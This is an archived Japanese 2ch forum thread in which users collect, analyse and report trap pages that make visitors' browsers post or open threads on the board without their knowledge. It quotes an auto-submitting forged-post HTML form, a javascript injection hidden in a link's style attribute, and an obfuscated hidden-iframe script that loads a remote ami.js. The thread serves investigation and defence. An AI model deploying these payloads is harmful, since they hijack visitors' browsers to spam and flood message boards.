■ スレ立て・投稿スクリプト対策
■ このスレッドは過去ログ倉庫に格納されています
踏むとスレ立てしたり投稿したりするスクリプトにつて
情報を集めたり対策したりするスレです。 <!--nobanner-->
<HTML>
<BODY onLoad="init()">
<script language="JavaScript">
<!--
function init(){
document.forms[0].submit.click();
}
-->
</script>
<FORM action="http://live6.2ch.net/test/bbs.cgi" method=post>
<INPUT name=subject type=hidden value="(・∀・)ゆうこりんりんりん">
<INPUT name=FROM type=hidden value="名無しさん@お腹いっぱい。">
<INPUT name=mail value="sage" type=hidden>
<INPUT name=MESSAGE value="
ゆうこりん
http://no.m78.com/up/data/up073877.jpg
" type=hidden>
<input type=hidden name=bbs value=livecx>
<input type=hidden name=time value=1071642768>
<INPUT type=submit value="全責任を負うことを承諾して書き込む" name=submit>
</FORM>
</BODY>
</HTML> フジ板で、また新種が登場してるし。
何か抜本的な対処法を考えないとダメだと思うが。 >>541さん
どういうスレが立つんですか? 踏んでしまうと。 >>586
今は流れてしまっていますが
>>546のスレがそれぞれ建つスクリプトでした。 >>592
http://qb3.2ch.net/test/read.cgi/sec2chd/1073058813/217
の,ソースとその先のスクリプトを調べてみましたがそれらしい記述が
見つかりませんです…(偽装してあると私にはわかりません)
どなたかソースを見つけた方はいますか?
この中で一番古い日付は
http://ex.2ch.net/test/read.cgi/net/1072776652/795
795 :795 :04/01/21 22:42 ID:5/NdN2ae
なので,あながち別物とも考えづらいけど。
スクリプトに詳しい方がおりましたら調査していただけると…
>>593
ttp://www.game-can.com/ffa/index.html の
> 4階 5連勝、つくよみの<a href=ttp://www.cronous.jp/index.asp%00" style='background:url(javascript:i=5;while(i)
{i--;open("ttp://amiiy.hp.infoseek.co.jp/?"+i?x2c"_blank"?x2c"left=9999?x2cscreenX=9999")})' name=" TARGET=_blank>cronous</a>HP:374413479/Max:465998585<br>
> 3階 4連勝、つくよみの<a href=ttp://www.cronous.jp/index.asp%00" style='background:url(javascript:i=5;while(i)
{i--;open("ttp://amiiy.hp.infoseek.co.jp/?"+i?x2c"_blank"?x2c"left=9999?x2cscreenX=9999")})' name=" TARGET=_blank>cronous</a>HP:465385436/Max:465385436<br>
> 2階 16連勝、つくよみの<a href=ttp://www.cronous.jp/index.asp%00" style='background:url(javascript:i=5;while(i)
{i--;open("ttp://amiiy.hp.infoseek.co.jp/?"+i?x2c"_blank"?x2c"left=9999?x2cscreenX=9999")})' name=" TARGET=_blank>cronous</a>HP:462467736/Max:462467736<br>
で跳んだ先のamiiy.hp.infoseek.co.jpにこんなもの↓が。私も詳しくないので詳しい方解析頼みます。。。
<BODY onload=setTimeout("IframeOpen()",1000)>
<SCRIPT>
if(location.search.match(/0$/)){thread='http://aa2.2ch.net/test/read.cgi/accuse/1074403046/l1'}
else if(location.search.match(/1$/)){thread='http://ex.2ch.net/test/read.cgi/net/1074257824/l1'}
else if(location.search.match(/2$/)){thread='http://ex.2ch.net/test/read.cgi/net/1074704813/l1'}
else if(location.search.match(/3$/)){thread='http://ex.2ch.net/test/read.cgi/net/1072221036/l1'}
else if(location.search.match(/4$/)){thread='http://ex.2ch.net/test/read.cgi/net/1074257824/l1'}
else if(location.search.match(/5$/)){thread='http://ex.2ch.net/test/read.cgi/net/1072776652/l1'}
else if(location.search.match(/6$/)){thread='http://aa2.2ch.net/test/read.cgi/accuse/1074403046/l1'}
else if(location.search.match(/7$/)){thread='http://ex.2ch.net/test/read.cgi/net/1074257824/l1'}
else if(location.search.match(/8$/)){thread='http://ex.2ch.net/test/read.cgi/net/1072776652/l1'}
else if(location.search.match(/9$/)){thread='http://ex.2ch.net/test/read.cgi/net/1074608630/l1'}
else if(location.search.match(/10$/)){thread='http://ex.2ch.net/test/read.cgi/net/1074608630/l1'}
else{thread='http://ex.2ch.net/test/read.cgi/net/1074608630/l1'}
if(thread.match(/^http:\/\/([^\/]+)\/test\/read\.cgi\/([^\/]+)\//i)){itai='http://'+RegExp.$1+'/'+RegExp.$2+'/i/'}
document.write('\x3cIFRAME\x20ID=myiframe\x20SRC=\x22'+itai+'\x22\x20width=0\x20height=0\x3e\x3c/IFRAME\x3e');
myiframe.open(thread,"_search");
function IframeOpen() {
myiframe.open("javascript:document.write('<body><script\x20src=javascript:document.charset=\x22sjis\x22>
</script\x3e'+document.body.innerHTML+'</body><script\x20src=http://amiiy.hp.infoseek.co.jp/ami.js></script\x3e');","_search");
}
</SCRIPT>
</BODY> >>593
スクリプトは詳しくありませんが
該当のところをクリックするとIEがデスクトップ上では開かずにブラクラ状態で繁殖しますタスクバーの表示で確認できます
履歴で呼び出すと検索窓からつついているみたい。履歴のプロパティから↓
飛び先のチェック
http://www.kakiko.com/check/?http://amiiy.hp.infoseek.co.jp/?1
ソースチェッカーオンライン
http://so.7walker.net/index.php?site=http://amiiy.hp.infoseek.co.jp/?1
?1〜?8←以上IEが動作します
そのなかの”js”でさらにループしているみたいですね
飛び先のチェック
http://www.kakiko.com/check/?http://amiiy.hp.infoseek.co.jp/ami.js
ソースチェッカーオンライン
http://so.7walker.net/index.php?site=http://amiiy.hp.infoseek.co.jp/ami.js
hを抜くとかえってあぶないのでチェックサイトへの直リンお許しください。 完全にランダムで文章作って自動で投稿させてますね。
こういうのはあったけど、ソースまで見つかったのは久々な気も。 >>595
補足
IEだと飛び先のチェックはime.nu経由だと二つ目のhttpが消えているので表示されないようです
ぷらら(plala)規制中50
http://aa2.2ch.net/test/read.cgi/accuse/1074403046/
もみたい。
ってもしかして対象スレもある程度ランダムで作ってるのかも… >>592-599
該当サイトは現在403になりました。
インフォシークにブラクラとして通報できたんですがサイト案内判りづらかった。。。
ついさっきまで探してました。
ソースチェッカーオンラインはデータログを元に表示しているようなのでまだそのままです。 遅くなりました。
>>594-601
乙でしたー。ありがとうございます。
その先までは見てませんでした…
スクリプト切って見てたので判らなかったし。
ところで,今現在のソースを見るとエンコードが簡体中国なんですが,
やっぱりアチラの方なんですかねえ…
>>602
IEの仕様(?)っぽいですね。
本来なら
http://qb3.2ch.net/test/read.cgi/sec2chd/1073058813/217
↑のサイトにも通報したかったのですがセキュリティが低すぎて
怖くてできませんでした。((;゚Д゚)ガクガクブルブル
>>603
乙でした。 ttp://fire.prohosting.com/script9/news.html#unko
unkoは前にもネトヲチ板爆撃してたな >>602
どうなんでしょ?漏れが見た時点では変数名がkigoとかだったんで
日本の人だと思うんですが。
なんにしろとまった用で何より。 >>606
なるほど,言われてみれば確かに。
やはり>>605なんですね…
>とまった用で何より
ですねー
>>604
すんません,見逃してました。
ありがとうございます。
>↑のサイトにも通報
どうやら最新の記録登録者みたいな感じで出ていたようですし,
サイト側でどうにかできたかぼみょーっすね…
おつでしたー
ν速が、メールストームアドレス記入のスクリプト投稿による攻撃にあっています。
http://news4.2ch.net/test/read.cgi/news/1075294815/
20 名前: ◆XR2r4WF7Gw :04/01/29 05:41 ID:fKIADwwu
スラムダンク32巻発売決定キタ━━━━━━(゚∀゚)━━━━━━ !!!!!
ttp://unyuu.yoll.net/dq.html
21 名前: ◆NGwDbY79ug :04/01/29 05:46 ID:FMNxp4Lg
スラムダンク32巻発売決定キタ━━━━━━(゚∀゚)━━━━━━ !!!!!
ttp://unyuu.yoll.net/dq.html
22 名前: ◆9l9B9xKFwA :04/01/29 06:22 ID:zIOp0+ZL
スラムダンク32巻発売決定キタ━━━━━━(゚∀゚)━━━━━━ !!!!!
ttp://unyuu.yoll.net/dq.html
他多数です。 >>609
ν速板全体がスクリプト嵐の嵐
朝っぱらから過激だね もしかして、スレ立て放題ってことにたいしてtatesugi=4096という天然ボケ対応? 最近、見なかったんだけど独身板
最近ツール・スクリプトっぽいのが
増えてきたので報告。
◎ 女性のセックル通知表 ◎
http://human2.2ch.net/test/read.cgi/male/1077198715/l50
173 :( ^,_J^) :04/03/13 03:00 ID:CUmvV+MI
ニュー即全体でスクリプト荒らしでました。 エヌ・オー・ディ32アンチウィルス Part11
http://pc.2ch.net/test/read.cgi/sec/1078857941/
こういうのって停止するのを待ってからレス削除以来出さなきゃダメだよね? winny信者♪ 【AtaraxiA】 土山nyう 沈黙7DL
http://comic3.2ch.net/test/read.cgi/doujin/1080811516/
自動か手動かわかりませんが、ID:AmKiIPqNがコピペ荒らししてます 下痢トラップ類似のスクリプトでガンガンスレ立ってます。
http://ex2.2ch.net/net/ bbs.cgiで対応してトラップではスレ立て出来ないようになってたのでは?
それとも ま た bbs.cgiの部分的先祖がえりとか。 爆弾製造元が見つからないとどうにもならないような… 2ch.netでリファラのフィルタをしているならば、up.isp.2ch.netが悪用できてしまいそうですけど
トラップページがどこにあるのか分からないと難しいですねぇ… >>626
2ちゃんねる内にリンクがあるとも限らないでしょうしねぇ。
ページの中に埋められてるだけで、利用者がまったく気が
付かないような感じなら、このまんま続くですかねぇ。
なんだか、メールワームみたいだな(感染した本人は気が付かない)。 スレ立て時は、毎回発生させたパスワードをそのつど入れさせる方式に
するのがいいんじゃないかなぁ?
鯖争奪戦スレで開発したおみくじ方式の投票制限方みたいに、
パスワード自体は画像形式で表示するようにして。
これだって画像からパスワードを画像処理で抽出出来ない事もないけど、
技術難度はかなり高くなるんじゃないかな? >>628
あたりがでかそうなんで却下される悪寒。
昔そういった掲示板ありましたねぇ。ひみこーどだっけか。
アレもそこそこ手を掛けてですけど、突破法確立されていたような。 そもそも
bbs.cgiどっか間違えて弄って、規制が戻ってる悪寒
とかじゃなくて、新しいトラップなんですか? >>631
トラップを踏んだことがわからないようになっている>>592-608あたりと同様なものだと思います。
>>625-627前回は発信源の報告があって通報できたのですが、、、、
>>628
> パスワード自体は画像形式で表示するようにして。
> これだって画像からパスワードを画像処理で抽出出来ない事もないけど、
> 技術難度はかなり高くなるんじゃないかな?
投票砲でそういうのありました。。。 >>632
なるほど、、
前回(>>592-)も防御できてた訳では無かったんですね。
こりゃ防ぎ様がなさげ。 完全にランダムだなぁ…
考えられるのは
1.リファラ規制をかいくぐるアドレスに配置されたhtml(もしくはスクリプト)
2.なんちゃってhttpエンジンを持っているプログラム(リファラ偽装が可能なので、かいくぐれる)(しかし、可能性低)
ぐらいですかねぇ… スプリクト読める方いますでしょうか?
過去ログ読んでいて>>595が内容は変わっていましたが復活していました。
http://so.7walker.net/index.php?site=http://amiiy.hp.infoseek.co.jp
http://www.kakiko.com/check/?http://amiiy.hp.infoseek.co.jp
ぁゃιぃ木彡る。。
なりきりチャットの痛いキャラやログを晒すスレ19
http://ex2.2ch.net/test/read.cgi/net/1079755865/
http://ex2.2ch.net/test/r.i/net/1079755865/1-954
目標(?)↑を見ましたが荒らされている様子は無かったです。
>>634はタイトル、名前欄、メール欄、本文がランダムなんですが
subject.value=nameset(Math.floor(Math.random()*6)+1);
FROM.value=nameset(Math.floor(Math.random()*6)+1);
mail.value=mailset(Math.floor(Math.random()*14));
MESSAGE.value=comset();
↑の記述が↓にありました。
http://so.7walker.net/index.php?site=http://amiiy.hp.infoseek.co.jp/ddd.js
http://www.kakiko.com/check/?http://amiiy.hp.infoseek.co.jp/ddd.js
実際に悪さをしているのか自分では判断できませんでした。○| ̄|_ OTZ orz ・・・ >>637
なるほど。
p.iのoption表示を利用してスクリプトを埋め込んでいるのね。
いろいろ考えるなぁ。 いつのまにかp.iは対処されましたね。
でもまだスレが立ってるような……。 気になって検索したのですが、
ttp://www.google.co.jp/search?num=100&hl=ja&lr=lang_ja&ie=UTF-8&oe=UTF-8&newwindow=1&q=%22amiiy.hp.infoseek.co.jp%22
該当サイトをクリックするとshitarabaの掲示板に飛ばされる間になにかをされているようです。(Javaアプレットが動かないのはなぜ?)
http://so.7walker.net/index.php?site=http://mbspro3.uic.to/user/ya_3.html
http://www.kakiko.com/check/?http://mbspro3.uic.to/user/ya_3.html
該当サイトを検索すると、嵐依頼されてました。
ttp://www.google.co.jp/search?num=100&hl=ja&lr=lang_ja&ie=UTF-8&oe=UTF-8&newwindow=1&sa=G&q=%22mbspro3.uic.to/user/ya_3.html%22
ttp://search.msn.co.jp/results.aspx?FORM=TOOLBR&q=mbspro3.uic.to%2Fuser%2Fya_3.html >>641
そこは単に荒らされて壊された掲示板サイトのようで……。
そこにあるamiiyのアドレスに実効性はないようですよ。 >>642
検証ありがとうございました。
飛ばされるのに時間がかかるのでへんだなぁっと思ってしまいました。 運用板の各所で節穴+ID爆撃多発中の最寄。
なんとなくですが、スクリプトはスクリプトでも、ワームのような悪寒が。。。 >>647
age2chのsearch.plを細工しただけでしょ。 http://idol.bbspink.com/test/read.cgi/club/1075640899/806,808,811,814-817,819,823,825,826,828,829,832,834
埋めスクリプトのようです。
でも間隔が 1 時間。
問題ないと云ってしまえばそれまでですが、スクリプトっぽく埋めているのが気になって。 古文・漢文板も
「x00位のスレッドにカキコ」貼ったり10レスごとにキリ番AA貼ったりする
スクリプトをずーっと回してるバカがいるんだが
誰も気にしていないほど過疎らしい 書き込みの少ない板を荒らすと
その板における荒らし書き込みの割合がすぐ大きくなるので
書き込みの多い板より対処されやすいらしいですよ
しかるべき所へ報告すればの話ですけど 中学生の子供が作っている友達同士のHPに荒らし?というものが来て子供が本当に
悩んでいます。私も何が何だか、、、どこをどうやって調べればいいかもわからずここに来てしまいました。
皆さん、その道のプロの方ばかりとお見受けするのでどうしたらよいか教えて下さい。
何だか子供も知らないうちに荒らしてくれっている掲示板に書かれているようです。
そのサイトはhttp://www2j.biglobe.ne.jp/~tatuta/cgi-bin/gbs/index.htm
です。そこの管理人さんに削除お願いすればいいのですか??パソコンがよくわからない子供が本をみながら
一生懸命作っていたので、、。皆さん、、教えて下さい。 >>652
ここは2ちゃんねるの運用情報を扱っている板なので、
全くの板違いです。せめて↓の板でやってくれ。
Web制作
http://pc5.2ch.net/hp/
(´-`).oO(てか釣りかマルチポストなのかなぁ、 延々使いまわしのコピぺが一分ほどの間隔で貼られています。スレが半日で800以上埋められてしまいした。もうすぐ1000到達ですが、現在進行中です。
警察板 http://society.2ch.net/police/
お巡りさんって呼ばれるとムカツクってほんと?
http://society.2ch.net/test/read.cgi/police/1084889171/l50
芸能有名人板で「ウンコ食べたい芸能人」というスレが乱立中 【供給】 お前らAthlon64は買うな!【不足】
http://pc6.2ch.net/test/read.cgi/pc/1083912446/914-
スクリプトっぽい(1分刻み)連続投稿。本文内容は空白(スペース) 665のスレタイは
「早稲田社学と中央法、どっちを選ぶ?」 VIPに比べれば狼の爆撃なんて銀玉鉄砲みたいなもん。
1分で1000発くらい喰らってるぞ ■ このスレッドは過去ログ倉庫に格納されています